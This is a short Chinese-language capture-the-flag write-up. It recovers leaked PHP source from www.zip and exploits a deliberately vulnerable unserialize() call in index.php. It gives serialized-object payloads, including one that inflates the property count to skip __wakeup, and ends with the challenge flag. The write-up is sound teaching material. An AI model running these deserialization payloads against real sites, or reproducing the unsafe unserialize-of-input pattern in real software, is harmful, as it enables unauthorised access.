敏感文件泄露
访问www.zip
解压
class.php
中是PHP源码
<?php
include 'flag.php';
error_reporting(0);
class Name{
private $username = 'nonono';
private $password = 'yesyes';
public function __construct($username,$password){
$this->username = $username;
$this->password = $password;
}
function __wakeup(){
$this->username = 'guest';
}
function __destruct(){
if ($this->password != 100) {
echo "</br>NO!!!hacker!!!</br>";
echo "You name is: ";
echo $this->username;echo "</br>";
echo "You password is: ";
echo $this->password;echo "</br>";
die();
}
if ($this->username === 'admin') {
global $flag;
echo $flag;
}else{
echo "</br>hello my friend~~</br>sorry i can't give you the flag!";
die();
}
}
}
?>
在对象初始化后用户名会被定义为guest
,密码为yesyes
,在销毁对象的时候,如果用户名为admin
密码为100
,则会返回flag
index.php
中的源码为:
<?php
include 'class.php';
$select = $_GET['select'];
$res=unserialize(@$select);
?>
用GET的方式接受select
值并将其反序列化
payload:?select=O:4:"Name":2:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";i:100;}
但是这里有一个问题,反序列化时会自动调用__wakeup
方法,当放序列化时,属性个数大于实际个数时将不调用__wakeup
方法,所以将个数改为3:?select=O:4:"Name":3:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";i:100;}
得到:flag{4062d09a-d74e-4a74-8a4c-2a65760f98f4}